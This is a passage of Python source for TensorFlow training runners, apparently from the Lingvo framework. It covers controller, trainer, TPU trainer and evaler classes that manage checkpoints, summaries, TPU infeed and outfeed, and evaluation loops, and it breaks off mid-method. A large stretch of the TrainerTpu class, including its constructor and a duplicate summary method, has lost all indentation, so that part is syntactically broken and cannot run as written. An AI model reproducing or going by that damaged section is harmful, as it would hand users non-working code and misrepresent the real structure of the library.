from tensorflow.python.tpu import device_assignment as device_assignment_lib
from tensorflow.python.tpu import tpu
from tensorflow.python.tpu import tpu_function
from tensorflow.python.tpu import training_loop as tpu_training_loop
from tensorflow.python.tpu.ops import tpu_ops
# pylint:enable=g-direct-tensorflow-import
FLAGS = flags.FLAGS
# useful for debugging.
def StartShell(local_ns=None):
  """Drops into an interactive IPython shell (debugging aid).

  The shell namespace is the caller-provided locals overlaid with this
  module's globals; globals win on name clashes.
  """
  import IPython  # pylint: disable=g-import-not-at-top
  shell_ns = dict(local_ns) if local_ns else {}
  shell_ns.update(globals())
  IPython.start_ipython(argv=[], user_ns=shell_ns)
class Controller(base_runner.BaseRunner):
  """Controller for a training cluster.

  Builds the model graph once, then loops: restoring/saving checkpoints
  (when it owns checkpointing) and writing merged summaries.
  """
  def __init__(self, *args, **kwargs):
    super().__init__(*args, **kwargs)
    if py_utils.IsEagerMode():
      raise RuntimeError('The controller job is not supported in eager mode.')
    self._job_name = 'controller'
    assert not self._model_task_name, 'Controller needs all tasks!'
    # Controller artifacts (summaries, params dumps) live in <logdir>/control.
    self._control_dir = os.path.join(self._logdir, 'control')
    tf.io.gfile.makedirs(self._control_dir)
    # The controller owns checkpointing unless the TPU trainer was asked to.
    self._checkpoint_in_controller = True
    if FLAGS.checkpoint_in_trainer_tpu:
      self._checkpoint_in_controller = False
      if self._early_stop:
        # Early stopping is driven by whichever job checkpoints.
        tf.logging.warning('Controller ignoring early_stop since '
                           'TrainerTpu is driving training.')
        self._early_stop = None
    with self._graph.as_default(), tf.container(self._container_id):
      with self._cluster, tf.device(self._cluster.GetPlacer()):
        self._summary_writer = self._CreateSummaryWriter(self._control_dir)
        self._model = self.params.Instantiate()
        self._params = self._model.params
        self._model.ConstructFPropBPropGraph()
        self._summary_op = tf.summary.merge_all()
        self._initialize_tables = tf.tables_initializer()
        self._initialize_local_vars = tf.local_variables_initializer()
        self._initialize_global_vars = tf.global_variables_initializer()
        self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
        if self._checkpoint_in_controller:
          self._checkpointer = self._CreateCheckpointer(
              self._train_dir,
              self._model,
              init_op=self._initialize_global_vars)
      self._ExportMetrics(params=self.params)
      self._model_analysis, self._total_num_params = summary_utils.ModelAnalysis(
          self._model, FLAGS.inspect_model_topn, FLAGS.inspect_model_part_regex)
      py_utils.LogMultiLines('MODEL ANALYSIS', self._model_analysis)
      self._WriteToLog(self._model_analysis, self._control_dir,
                       'model_analysis.txt')
      self._WriteToLog(self.params.ToText(), self._control_dir, 'params.txt')
      self._WriteToLog(
          text_format.MessageToString(self.params.ToProto(), as_utf8=True),
          self._control_dir, 'params.pbtxt')
      self._summary_writer.add_graph(self._graph)
  def Start(self):
    """Starts the controller loop on a managed runner thread."""
    super().Start()
    self._RunLoop('controller', self._Loop)
  def StartEnqueueOp(self, op):
    """Runs `op` repeatedly on a dedicated enqueue thread."""
    self._RunLoop(
        'controller/enqueue_op/%s' % op.name, self._LoopEnqueue, loop_args=[op])
  def _Loop(self):
    # Main loop: every min(10, save_interval_seconds) seconds, optionally
    # restore/save checkpoints and emit summaries until _ShouldStop fires.
    with tf.container(self._container_id), self._GetSession() as sess:
      if FLAGS.interactive:
        # Into interactive debugging mode.
        StartShell(locals())
        return
      # This initializes local tables
      sess.run(self._initialize_tables)
      # This initializes local variables.
      sess.run(self._initialize_local_vars)
      for task in self._model.tasks:
        task.input.Initialize(sess)
      # TODO(zhifengc): Moves these options into params.
      tp = self.params.train
      summary_interval_steps = tp.summary_interval_steps
      save_interval_seconds = tp.save_interval_seconds
      next_summary_step = 1
      if not self._checkpoint_in_controller:
        # Another job initializes the variables; wait for it.
        global_step = self._WaitUntilInit(sess)
      while True:
        now = time.time()
        next_iteration_seconds = now + min(
            10, save_interval_seconds)  # 10 seconds or less
        if self._checkpoint_in_controller:
          # Init/restore variable if needed.
          self._checkpointer.RestoreIfNeeded(sess)
        global_step = sess.run(self._model.global_step)
        if self._ShouldStop(sess, global_step):
          tf.logging.info('Training finished.')
          if self._checkpoint_in_controller:
            # Final checkpoint before shutting down.
            self._checkpointer.Save(sess, global_step)
          sess.close()
          self._DequeueThreadComplete()
          return
        if self._checkpoint_in_controller:
          # Checkpoint if it's time.
          self._checkpointer.MaybeSave(sess, global_step)
        # Summary.
        if self._summary_op is not None and global_step >= next_summary_step:
          global_step, summary_str = sess.run(
              [self._model.global_step, self._summary_op])
          next_summary_step = global_step + summary_interval_steps
          if isinstance(summary_str, np.ndarray) and summary_str.size == 0:
            # An empty ndarray means no summaries were produced this round.
            tf.logging.info('Skipping summary: %s', summary_str)
          else:
            self._summary_writer.add_summary(summary_str, global_step)
            tf.logging.info('Write summary @%s', global_step)
          self._SummarizeValue(global_step, 'total_num_params',
                               self._total_num_params)
          tf.logging.info('Write summary done: step %d', global_step)
        now = time.time()
        if now < next_iteration_seconds:
          # Sleep off the remainder of this iteration's time budget.
          time.sleep(next_iteration_seconds - now)
  def _SummarizeValue(self, step, tag, value):
    """Writes a single scalar summary `tag`=`value` at `step`."""
    self._summary_writer.add_summary(
        metrics.CreateScalarSummary(tag, value), step)
class Trainer(base_runner.BaseRunner):
  """Trainer on non-TPU."""
  def __init__(self, *args, **kwargs):
    super().__init__(*args, **kwargs)
    self._job_name = 'trainer'
    with self._graph.as_default(), tf.container(self._container_id):
      try:
        # One summary writer per task for multi-task schedules.
        # NOTE(review): assumes self._model/task_schedule is available at
        # this point (presumably provided by the base runner); single-task
        # models take the AttributeError path below — confirm.
        self._task_probs_summary_writers = []
        for task in self._model.task_schedule.tasks:
          path = os.path.join(os.path.join(self._train_dir, task))
          tf.io.gfile.makedirs(path)
          self._task_probs_summary_writers.append(
              self._CreateSummaryWriter(path))
      except AttributeError:
        tf.logging.info('AttributeError. Expected for single task models.')
        self._task_probs_summary_writers = []
      # Only the chief (task 0) writes summaries to avoid duplicates.
      if self.params.cluster.task == 0:
        self._summary_writer = self._CreateSummaryWriter(self._train_dir)
        self._CreateTF2SummaryWriter(self._train_dir)
      else:
        self._summary_writer = None
      with self._cluster, tf.device(
          self._cluster.GetPlacer()), self._TF2SummaryContext():
        self._model = self.params.Instantiate()
        self._params = self._model.params
        self._model.ConstructFPropBPropGraph()
      self._CreateTF2SummaryOps()
      self._initialize_tables = tf.tables_initializer()
      self._initialize_local_vars = tf.local_variables_initializer()
      self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
      tf.logging.info('Trainer number of enqueue ops: %d',
                      len(self.enqueue_ops))
      self._step_rate_tracker = summary_utils.StepRateTracker()
      if self.params.cluster.task == 0:
        self._WriteToLog(self.params.ToText(), self._train_dir,
                         'trainer_params.txt')
      worker_id = self.params.cluster.task
      # Stagger worker start-up: worker k waits ~k*(k+1)/2 * delay steps so
      # that workers join training gradually.
      self._start_up_delay_steps = (((worker_id + 1) * worker_id / 2) *
                                    self.params.train.start_up_delay_steps)
  def _SummarizeValue(self, steps, tag, value, writer=None):
    """Writes scalar `tag`=`value` at `steps` to `writer` or the default."""
    if writer:
      writer.add_summary(metrics.CreateScalarSummary(tag, value), steps)
    elif self._summary_writer:
      self._summary_writer.add_summary(
          metrics.CreateScalarSummary(tag, value), steps)
  def Start(self):
    """Starts the trainer loop on a managed runner thread."""
    super().Start()
    self._RunLoop('trainer', self._Loop)
  def StartEnqueueOp(self, op):
    """Runs `op` repeatedly on a dedicated enqueue thread."""
    self._RunLoop(
        'trainer/enqueue_op/%s' % op.name, self._LoopEnqueue, loop_args=[op])
  def _LoopEnqueue(self, op):
    # Evaler/Controller jobs may find that the trial is infeasible and report
    # done earlier. This is an important check since the trainer may retry
    # indefinitely without it.
    if self._trial.ShouldStop():
      tf.logging.info('Training skipped (trial requested to stop).')
      return
    return super()._LoopEnqueue(op)
  def _Loop(self):
    # Evaler/Controller jobs may find that the trial is infeasible and report
    # done earlier. This is an important check since the trainer may retry
    # indefinitely without it.
    if self._trial.ShouldStop():
      tf.logging.info('Training skipped (trial requested to stop).')
      return
    with tf.container(
        self._container_id), self._cluster, self._GetSession() as sess:
      # This initializes local tables
      sess.run(self._initialize_tables)
      # This initializes local variables.
      sess.run(self._initialize_local_vars)
      self._InitializeTF2SummaryWriter(sess)
      for task in self._model.tasks:
        task.input.Initialize(sess)
      # Respect the staggered start computed in __init__.
      global_step = self._WaitUntilInit(sess, self._start_up_delay_steps)
      status_interval_steps = 100
      next_status_step = 1
      eval_metrics = None
      while True:
        if (self._trial.ShouldStopAndMaybeReport(global_step, eval_metrics) or
            self._ShouldStop(sess, global_step)):
          tf.logging.info('Training finished.')
          if self._early_stop:
            time.sleep(300)  # controller hangs if it doesn't finish first
          self._DequeueThreadComplete()
          return
        # If a task is explicitly specified, only train that task.
        if self._model_task_name:
          task = self._model.GetTask(self._model_task_name)
        else:
          # Note: This is a slightly stale global_step value from the previous
          # sess.run() call.
          # For multi-task models, `self._model.task_schedule.cur_probs` will
          # be updated.
          task = self._model.SampleTask(global_step)
          if self._task_probs_summary_writers:
            for index, prob in enumerate(self._model.task_schedule.cur_probs):
              self._SummarizeValue(global_step, 'task_probability', prob,
                                   self._task_probs_summary_writers[index])
            try:
              for index, task in enumerate(self._model.tasks):
                self._SummarizeValue(global_step, 'task_weight',
                                     sess.run(task.vars.task_weight),
                                     self._task_probs_summary_writers[index])
            except AttributeError:
              # Tasks without a task_weight variable are skipped silently.
              pass
        (_, eval_metrics, per_example_tensors) = sess.run([
            task.train_op,
            task.eval_metrics,
            task.per_example_tensors,
        ])
        # Explicitly fetch global_step after running train_op.
        # TODO(b/151181934): Investigate this behavior further.
        task_global_step = sess.run(task.global_step)
        task.ProcessFPropResults(sess, task_global_step, eval_metrics,
                                 per_example_tensors)
        self._RunTF2SummaryOps(sess)
        global_step = sess.run(self._model.global_step)
        step_rate, example_rate, total_examples = (
            self._step_rate_tracker.ComputeStepRate(
                global_step, eval_metrics['num_samples_in_batch'][0]))
        self._SummarizeValue(global_step, 'global_step/sec', step_rate)
        self._SummarizeValue(global_step, 'examples/sec', example_rate)
        self._SummarizeValue(global_step, 'total_samples', total_examples)
        msg = 'step:%6d, steps/sec: %0.2f, examples/sec: %0.2f' % (
            global_step, step_rate, example_rate)
        for key, (val, _) in sorted(eval_metrics.items()):
          msg += ' %s:%.8g' % (key, val)
          self._SummarizeValue(global_step, key, val)
        if global_step >= next_status_step:
          self._SetStatusMessage(msg)
          self._ExportMetrics(
              # Metrics expects python int, but global_step is numpy.int64.
              global_step=int(global_step),
              step_rate=step_rate,
              example_rate=example_rate)
          next_status_step = global_step + status_interval_steps
        else:
          tf.logging.info(msg)
        self._model.ProcessFPropResults(sess, global_step, eval_metrics,
                                        per_example_tensors)
class TrainerTpu(base_runner.BaseRunner):
"""Trainer on TPU."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if py_utils.IsEagerMode():
raise RuntimeError('TrainerTpu is not supported in eager mode. '
'Please run with --use_executor '
'(or --job=executor_tpu if running locally).')
self._job_name = 'trainer_tpu'
# Multiple TPU trainer tasks not tested/implemented.
assert self._cluster.num_replicas == 1
data_parallelism = self._cluster.num_splits_per_client
assert data_parallelism
num_devices_per_split = self._cluster.num_devices_per_split
tf.logging.info('data_parallelism: %d, num_devices_per_split: %d',
data_parallelism, num_devices_per_split)
self._steps_per_loop = min(self.params.train.tpu_steps_per_loop,
self.params.train.max_steps)
self._step_rate_tracker = summary_utils.StepRateTracker()
self._compile_op = None
self._initialized = threading.Event()
tf.logging.info(
'Creating TrainerTpu using data parallelism %s '
'and %s steps_per_loop', data_parallelism, self._steps_per_loop)
@py_utils.RetryOnTransientTfError()
def _WaitUntilInitTpu():
"""Wait until the model is ready."""
try:
# tpu.initialize_system() is called with None as embedding_config, as
# embedding_config is not available yet. Later in _Loop, it is called
# with the correct embedding_config. Since it cannot be called twice in
# the same graph with different embedding_config, we use a dummy_graph
# here.
dummy_graph = tf.Graph()
with dummy_graph.as_default():
tpu_initialize_system_op = tf.tpu.initialize_system(
embedding_config=None, job=None)
with self._GetSession(graph=dummy_graph) as sess:
topology = sess.run(tpu_initialize_system_op)
if self.params.train.tpu_computation_shape is None:
computation_shape = py_utils.ComputationShape(num_devices_per_split,
topology)
else:
computation_shape = self.params.train.tpu_computation_shape
assert num_devices_per_split == np.prod(computation_shape)
if self.params.train.tpu_device_order_mode is None:
device_assignment = device_assignment_lib.device_assignment(
topology,
computation_shape=computation_shape,
num_replicas=data_parallelism)
else:
device_assignment = device_assignment_lib.device_assignment(
topology,
computation_shape=computation_shape,
num_replicas=data_parallelism,
device_order_mode=self.params.train.tpu_device_order_mode)
py_utils.SetTpuDeviceAssignment(device_assignment)
tf.logging.info('device_assignment.core_assignment: %s',
str(device_assignment.core_assignment))
tf.logging.info('device_assignment.topology.device_coordinates: %s',
str(device_assignment.topology.device_coordinates))
except py_utils.transient_tf_errors as e:
tf.logging.info('TPU initialization failed: %s', e)
raise
_WaitUntilInitTpu()
with self._graph.as_default(), tf.container(
self._container_id), contextlib.ExitStack() as stack:
if FLAGS.pdb_on_exception:
stack.enter_context(pdb_wrapper.catch_post_mortem())
self._summary_writer = self._CreateSummaryWriter(self._train_dir)
self._CreateTF2SummaryWriter(self._train_dir)
with self._cluster, tf.device(
self._cluster.GetPlacer()), self._TF2SummaryContext():
self._model = self.params.Instantiate()
self._task = self._model.GetTask()
self._task.input.InfeedSetupGraph()
self._eval_metrics = metrics.TpuEvalMetrics()
# Needed due to the AddExtraTheta() reference to global_step when
# instantiating the InputGenerator.
_ = py_utils.GetOrCreateGlobalStepVar()
self._CreateTF2SummaryOps()
self._input_stats_summary_interval_steps = (
self._task.input.params.input_stats_summary_interval_steps)
def TpuTrainStep(*args):
"""Train a shard of a batch on a single TPU core.
Args:
*args: metrics values from previous steps.
Returns:
New summed metrics values and a train_op.
"""
self._model.ConstructFPropBPropGraph()
tpu_embedding_collection = (
tpu_embedding_layers.TpuEmbeddingCollection.Get())
self._load_ops = tpu_embedding_collection.load_ops
self._retrieve_ops = tpu_embedding_collection.retrieve_ops
self._tpu_embedding = tpu_embedding_collection.tpu_embedding
per_step_eval_metrics = self._eval_metrics.SetMetrics(
self._task.eval_metrics, args)
outfeed_op = self._OutfeedEnqueue(self._task.per_example_tensors)
summed_metrics = []
assert len(per_step_eval_metrics) == len(args)
with tf.control_dependencies([outfeed_op]):
for x, y in zip(per_step_eval_metrics, args):
summed_metrics.append(x + y)
return summed_metrics + [self._task.train_op]
@tpu_function.on_device_training_loop
def TpuTrain():
loop_result = tpu_training_loop.repeat(
self._steps_per_loop,
TpuTrainStep,
inputs=self._eval_metrics.initial_values,
name='train_loop')
# Final metrics are the avg across self._steps_per_loop steps.
return self._eval_metrics.FinalizeMetrics(loop_result)
self._compile_op, batch_parallel_res = tpu.split_compile_and_shard(
TpuTrain,
num_shards=data_parallelism,
device_assignment=py_utils.GetTpuDeviceAssignment())
outfeed_dequeue_op = self._OutfeedDequeueLoop(
self._task.per_example_tensors, self._steps_per_loop,
self._cluster.num_splits_per_client)
def _ConstructPostTrainingLoop(train_loop_op, outfeed_dequeue_op):
"""Returns the op for tpu training with tail cpu computation."""
# Adds a tail computation that is run after the tpu_training loop
# step finishes. This allows us to run certain computation that
# acts on the variable between tpu_train_loop iterations and
# amortizing the cost of the operations. Alternative of running
# tpu.outside_compilation & using tf.cond is expensive.
with tf.control_dependencies(train_loop_op):
self._model.ConstructPostTrainingLoop(outfeed_dequeue_op)
with tf.control_dependencies([self._task.post_training_loop_op]):
return ([[tf.identity(o) for o in train_loop_op],
outfeed_dequeue_op])
# Get metric result from a single replica; they are all same here.
all_tpu_ops = [t[0] for t in batch_parallel_res]
self._tpu_train_ops = (
_ConstructPostTrainingLoop(all_tpu_ops, outfeed_dequeue_op))
self._initialize_local_vars = tf.local_variables_initializer()
self._initialize_global_vars = tf.global_variables_initializer()
self._initialize_tables = tf.tables_initializer()
if FLAGS.checkpoint_in_trainer_tpu:
self._checkpointer = checkpointer.Checkpointer(
self._train_dir, self._model, init_op=self._initialize_global_vars)
self.enqueue_ops = self._task.input.tpu_infeed_op
tf.logging.info('Trainer number of enqueue ops: %d',
len(self.enqueue_ops))
if self._task.input.input_data_summary_layout is not None:
self._summary_writer.add_summary(
self._task.input.input_data_summary_layout)
if FLAGS.checkpoint_in_trainer_tpu:
self._model_analysis, self._total_num_params = (
summary_utils.ModelAnalysis(self._model, FLAGS.inspect_model_topn,
FLAGS.inspect_model_part_regex))
py_utils.LogMultiLines('MODEL ANALYSIS', self._model_analysis)
self._WriteToLog(self._model_analysis, self._train_dir,
'model_analysis.txt')
# Saves the trainer params.
self._WriteToLog(self.params.ToText(), self._train_dir,
'trainer_params.txt')
def _GetSession(self, **kwargs):
return super()._GetSession(cluster_def=self._worker_cluster_def, **kwargs)
def _OutfeedEnqueue(self, per_example_tensors):
if not per_example_tensors:
return tf.no_op()
per_example_tensors = py_utils.NestedMap(per_example_tensors)
return tpu_ops.outfeed_enqueue_tuple(per_example_tensors.Flatten())
  def _OutfeedDequeueLoop(self, per_example_tensors, num_loops, num_devices):
    """Process all per-example tensor outfeed data for a TPU sess.run.

    Args:
      per_example_tensors: dict of key -> tensor as generated by TpuTrainStep.
      num_loops: number of times that TpuTrainStep will be executed by TpuTrain.
      num_devices: number of TPU cores assigned to this process.

    Returns:
      A dict of per-example tensors from the latest TpuTrainStep.
    """
    if not per_example_tensors:
      return tf.no_op()

    # Keys are iterated in sorted order so that the shape/type lists and the
    # final dict reconstruction below line up with the same tensor order.
    tensor_shapes = [
        py_utils.GetShape(per_example_tensors[key])
        for key in sorted(per_example_tensors)
    ]
    tensor_types = [
        tf.as_dtype(per_example_tensors[key].dtype)
        for key in sorted(per_example_tensors)
    ]

    def LoopBody(i, *input_arrays):
      """Process outfeed data for a single TpuTrainStep.

      Args:
        i: current loop index.
        *input_arrays: One tf.TensorArray per outfeed tensor.

      Returns:
        i+1 (new index) plus post-write tf.TensorArray handles.
      """
      # Outfeed ops execute on each JF node, so they must be located on the
      # nodes.
      outfeed_devices = []
      device_assignment = py_utils.GetTpuDeviceAssignment()
      assert device_assignment
      # One dequeue op per (replica, core), placed on that core's host.
      for replica in range(device_assignment.num_replicas):
        for core in range(device_assignment.num_cores_per_replica):
          with tf.device(device_assignment.host_device(replica, core)):
            outfeed_devices.append(
                tpu_ops.outfeed_dequeue_tuple(
                    tensor_types,
                    tensor_shapes,
                    device_ordinal=device_assignment.tpu_ordinal(replica,
                                                                 core)))
      offset = i * num_devices
      output_arrays = list(input_arrays)
      # Each output_array holds a different per-example tensor. We get results
      # for each tensor from each TPU for each TpuTrainStep call.
      for j in range(len(output_arrays)):
        for k in range(len(outfeed_devices)):
          output_arrays[j] = output_arrays[j].write(offset + k,
                                                    outfeed_devices[k][j])
      return tuple([i + 1] + output_arrays)

    def LoopCond(i, *output_arrays):
      # Continue until the step counter reaches num_loops; the arrays are
      # only threaded through for the while_loop signature.
      del output_arrays
      return i < num_loops

    # One TensorArray per outfeed tensor, sized for every device and loop.
    output_arrays = []
    for i in range(len(tensor_shapes)):
      output_arrays.append(
          tf.TensorArray(
              tensor_types[i],
              size=num_loops * num_devices,
              element_shape=tensor_shapes[i]))
    # Loop once for each time that TpuTrainStep runs.
    output_arrays = tf.while_loop(
        LoopCond, LoopBody, [0] + output_arrays, parallel_iterations=1)[1:]
    concatenated_arrays = [array.concat() for array in output_arrays]
    return dict(zip(sorted(per_example_tensors), concatenated_arrays))
  def _CleanUp(self):
    """Resets the initialization event after the trainer loop fails."""
    # If there's an exception, we want _LoopEnqueue to wait until
    # everything is initialized before starting up.
    self._initialized.clear()
  def Start(self):
    """Starts the trainer loop on a background runner thread."""
    super().Start()
    # Run training.
    self._RunLoop('trainer', self._Loop, cleanup_func=self._CleanUp)
  def _InfeedLoop(self, sess):
    """Runs the infeed enqueue ops once for each step of a train loop."""
    tf.logging.info('_InfeedLoop start')
    for _ in range(self._steps_per_loop):
      sess.run(self.enqueue_ops)
  def StartEnqueueOp(self, op):
    """Starts a thread that repeatedly runs the given infeed enqueue op."""
    # When retrieve ops for TPU embedding is present, we use _InfeedLoop above
    # instead to make sure enqueue and retrieve does not happen at the same
    # time as required by TPU embedding.
    # We can remove this by using a tf.while_loop driven infeed op.
    if self._retrieve_ops:
      return
    self._RunLoop(
        'trainer/enqueue_op/%s' % op.name, self._LoopEnqueue, loop_args=[op])
def _SummarizeValue(self, steps, tag, value):
self._summary_writer.add_summary(
metrics.CreateScalarSummary(tag, value), steps)
  def _LoopEnqueue(self, op):
    """Runs the infeed enqueue loop once training is initialized.

    Args:
      op: the enqueue op to run repeatedly in the base-class loop.
    """
    # Evaler/Controller jobs may find that the trial is infeasible and report
    # done earlier. This is an important check since the trainer may retry
    # indefinitely without it.
    if self._trial.ShouldStop():
      tf.logging.info('Training skipped (trial requested to stop).')
      return
    # Wait for _Loop to initialize variables first before attempting to infeed.
    tf.logging.info('_LoopEnqueue waiting for _initialized...')
    self._initialized.wait()
    tf.logging.info('_LoopEnqueue proceeding.')
    # The global step may not be initialized in this thread if the target server
    # uses session state isolation (e.g. Cloud TPUs).
    sess = self._GetSession()
    if FLAGS.checkpoint_in_trainer_tpu:
      self._checkpointer.RestoreGlobalStepIfNeeded(sess)
    # Get merged summary op for training related input data stats from the
    # tasks's input generator.
    self._merged_input_data_summary_op = (
        self._task.input.merged_input_data_summary_op)
    return super()._LoopEnqueue(op, sess)
  def _Loop(self):
    """Runs the main TPU training loop until training finishes or stops."""
    # Evaler/Controller jobs may find that the trial is infeasible and report
    # done earlier. This is an important check since the trainer may retry
    # indefinitely without it.
    if self._trial.ShouldStop():
      tf.logging.info('Training skipped (trial requested to stop).')
      self._DequeueThreadComplete()
      return
    with tf.container(
        self._container_id), self._cluster, self._GetSession() as sess:
      config_proto = (
          self._tpu_embedding.config_proto
          if self._tpu_embedding is not None else None)
      sess.run(
          tf.tpu.initialize_system(embedding_config=config_proto, job=None))
      sess.run(self._initialize_tables)
      sess.run(self._initialize_local_vars)
      self._InitializeTF2SummaryWriter(sess)
      if FLAGS.run_locally == 'tpu':
        sess.run(self._initialize_global_vars)
      # Compile the TPU program once up front and fail fast on errors.
      self._SetStatusMessage('Compiling ...')
      compilation_result = sess.run(self._compile_op)
      comp_result_proto = tpu_compilation_result.CompilationResultProto()
      comp_result_proto.ParseFromString(compilation_result)
      if comp_result_proto.status_error_message:
        tf.logging.fatal('Compilation failed: {}'.format(
            comp_result_proto.status_error_message))
      self._SetStatusMessage('Compiling done.')
      if FLAGS.checkpoint_in_trainer_tpu:
        # For b/134415393 -- better to initialize to a known state than
        # rely on what's in the session on the trainer/TPU worker.
        tf.logging.info('TrainerTpu: Force restore or initialize.')
        self._checkpointer.Restore(sess, force_reinitialize=True)
      global_step = sess.run(self._model.global_step)
      # Unblock _LoopEnqueue, which waits on this event before infeeding.
      self._initialized.set()
      eval_metrics = None
      if FLAGS.checkpoint_in_trainer_tpu and global_step == 0:
        # Always save a ckpt at step 0.
        self._checkpointer.MaybeSave(sess, global_step)
      sess.run(self._load_ops)
      while True:
        train_steps_start = time.perf_counter()
        if FLAGS.checkpoint_in_trainer_tpu:
          # Init/restore variable if needed.
          self._checkpointer.RestoreIfNeeded(sess)
        if self._trial.ShouldStopAndMaybeReport(
            global_step, eval_metrics) or self._ShouldEarlyStop(sess):
          # Early terminate gracefully by setting a new max step horizon: three
          # more TPU steps to ensure that the enqueue ops can gracefully
          # terminate as well. Otherwise, the enqueue thread may be stuck, e.g.,
          # when the queue is filled and the enqueue thread is blocked when
          # pushing new data to the queue, if the trainer thread decides to
          # early stop (i.e., `self._ShouldEarlyStop(sess)` is true), then the
          # enqueue thread could be blocked forever as the trainer thread would
          # never consume any new data from the queue. After setting the new
          # max step horizon, the trainer thread would continue run for 3 loops
          # (3K global steps usually), so the enqueue thread could get a chance
          # to move forward and run `_ShouldStop()` to stop gracefully.
          # Updated this to account for `tpu_infeed_parallelism` which could
          # allow for more enqueue threads to get further ahead of the trainer
          # thread.
          if self._max_steps_for_early_stop is None:
            tpu_infeed_parallelism = self._task.input.params.tpu_infeed_parallelism
            self._max_steps_for_early_stop = global_step + 3 * tpu_infeed_parallelism * self._steps_per_loop
            tf.logging.info('Early stopping at step: %d',
                            self._max_steps_for_early_stop)
        if self._ShouldStop(sess, global_step, check_early_stop=False):
          tf.logging.info('Training finished.')
          if FLAGS.checkpoint_in_trainer_tpu:
            self._checkpointer.Save(sess, global_step)
          self._DequeueThreadComplete()
          return
        if self._retrieve_ops:
          # Run the infeed loop on a separate thread so enqueue and the TPU
          # embedding retrieve below never overlap.
          infeed_loop_thread = threading.Thread(
              target=self._InfeedLoop, args=(sess,))
          infeed_loop_thread.start()
        tpu_train_op_start = time.perf_counter()
        values, outfeeds = sess.run(self._tpu_train_ops)
        tpu_train_op_secs = time.perf_counter() - tpu_train_op_start
        if self._retrieve_ops:
          infeed_loop_thread.join()
          tf.logging.info('Retrieve params.')
          sess.run(self._retrieve_ops)
          tf.logging.info('Retrieve params done.')
        self._eval_metrics.PackMetricsValues(values)
        eval_metrics = self._eval_metrics.metrics
        # Note: global_step is incremented by self._steps_per_loop by the
        # previous sess.run call.
        task_global_step = sess.run(self._task.global_step)
        global_step = sess.run(self._model.global_step)
        if not self._task.per_example_tensors:
          outfeeds = {}
        self._task.ProcessFPropResults(sess, task_global_step, eval_metrics,
                                       outfeeds)
        self._model.ProcessFPropResults(sess, global_step, eval_metrics,
                                        outfeeds)
        step_rate, example_rate, total_examples = (
            self._step_rate_tracker.ComputeStepRate(
                global_step,
                eval_metrics['num_samples_in_batch'][0] * self._steps_per_loop))
        self._RunTF2SummaryOps(sess)
        self._SummarizeValue(global_step, 'global_step/sec', step_rate)
        self._SummarizeValue(global_step, 'examples/sec', example_rate)
        self._SummarizeValue(global_step, 'total_samples', total_examples)
        if FLAGS.checkpoint_in_trainer_tpu:
          self._SummarizeValue(global_step, 'total_num_params',
                               self._total_num_params)
        msg = 'step:%6d, steps/sec: %0.2f, examples/sec: %0.2f' % (
            global_step, step_rate, example_rate)
        for key, (val, _) in sorted(eval_metrics.items()):
          msg += ' %s:%.8g' % (key, val)
          self._SummarizeValue(global_step, key, val)
        self._SetStatusMessage(msg)
        # Add model eval metrics to early stop metric history.
        for metric_name, (metric_value, _) in eval_metrics.items():
          self._UpdateEarlyStopMetric('train', global_step, metric_name,
                                      metric_value)
        checkpoint_write_secs = 0.0
        if FLAGS.checkpoint_in_trainer_tpu:
          checkpoint_write_start = time.perf_counter()
          checkpoint_saved = self._checkpointer.MaybeSave(sess, global_step)
          if checkpoint_saved:
            checkpoint_write_secs = time.perf_counter() - checkpoint_write_start
        train_steps_secs = time.perf_counter() - train_steps_start
        self._ExportMetrics(
            # Metrics expects python int, but global_step is numpy.int64.
            global_step=int(global_step),
            step_rate=step_rate,
            example_rate=example_rate,
            tpu_train_op_secs=tpu_train_op_secs,
            checkpoint_write_secs=checkpoint_write_secs,
            total_train_steps_secs=train_steps_secs,
            **{k: v[0] for k, v in eval_metrics.items()})
class Evaler(base_runner.BaseRunner):
  """Evaler: runs eval on checkpoints produced by the trainer."""

  def __init__(self, eval_type, *args, **kwargs):
    super().__init__(*args, **kwargs)
    self._job_name = 'evaler_' + eval_type
    self._output_name = 'eval_' + eval_type
    # Only the 'train' split evaler exports the model.
    self._export = eval_type == 'train'
    if not self._export:
      tf.logging.info(f'Job {self._job_name} will not export the model.')
    self.params.cluster.do_eval = True
    self._cluster = cluster_factory.Cluster(self.params.cluster)
    self._eval_dir = os.path.join(self._logdir, self._output_name)
    if self._model_task_name:
      self._eval_dir += '_' + str(self._model_task_name)
    tf.io.gfile.makedirs(self._eval_dir)
    self._eval_path = None
    # Multitask params doesn't have 'task'.
    if 'task' in self.params:
      self._eval_path = checkpointer.GetSpecificCheckpoint(
          self.params.task.eval.load_checkpoint_from)
    self._should_report_metrics = self._job_name.startswith(
        self._cluster.reporting_job)
    with self._graph.as_default(), tf.container(self._container_id):
      self._summary_writer = self._CreateSummaryWriter(self._eval_dir)
      self._CreateTF2SummaryWriter(self._eval_dir)
      with self._cluster, tf.device(
          self._cluster.GetPlacer()), self._TF2SummaryContext():
        self._model = self.params.Instantiate()
        self._params = self._model.params
        self._model.ConstructFPropGraph()
        self._task = self._model.GetTask(self._model_task_name)
        self._checkpointer = self._CreateCheckpointer(self._train_dir,
                                                      self._model)
      self._CreateTF2SummaryOps()
      self._summary_op = tf.summary.merge_all()
      self._initialize_tables = tf.tables_initializer()
      self._initialize_local_vars = tf.local_variables_initializer()
      # No queues are allowed for eval models.
      self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
      assert not self.enqueue_ops
      self._input_stats_summary_interval_steps = (
          self._task.input.params.input_stats_summary_interval_steps)
    # Saves the graph def.
    self._WriteToLog(self.params.ToText(), self._eval_dir, 'params.txt')
    if self.params.cluster.task == 0:
      tf.io.write_graph(self._graph.as_graph_def(), self._eval_dir,
                        '%s.pbtxt' % self._output_name)

  def Start(self):
    """Starts the eval loop on a background runner thread."""
    super().Start()
    self._RunLoop(self._job_name, self._Loop)

  def _Loop(self):
    """The main loop."""
    with tf.container(
        self._container_id), self._cluster, self._GetSession() as sess:
      # This initializes local tables
      sess.run(self._initialize_tables)
      # This initializes local variables.
      sess.run(self._initialize_local_vars)
      self._InitializeTF2SummaryWriter(sess)
      self._task.input.Initialize(sess)
      if self._eval_path:
        self._EvalOnce(sess, self._eval_path)
        self._UpdateProcessedCheckpoints(self._eval_dir, self._eval_path)
      elif self._task.params.eval.eval_all_checkpoints:
        self._RunOnAllCheckpoints(sess, self._EvalOnce, self._eval_dir)
      else:
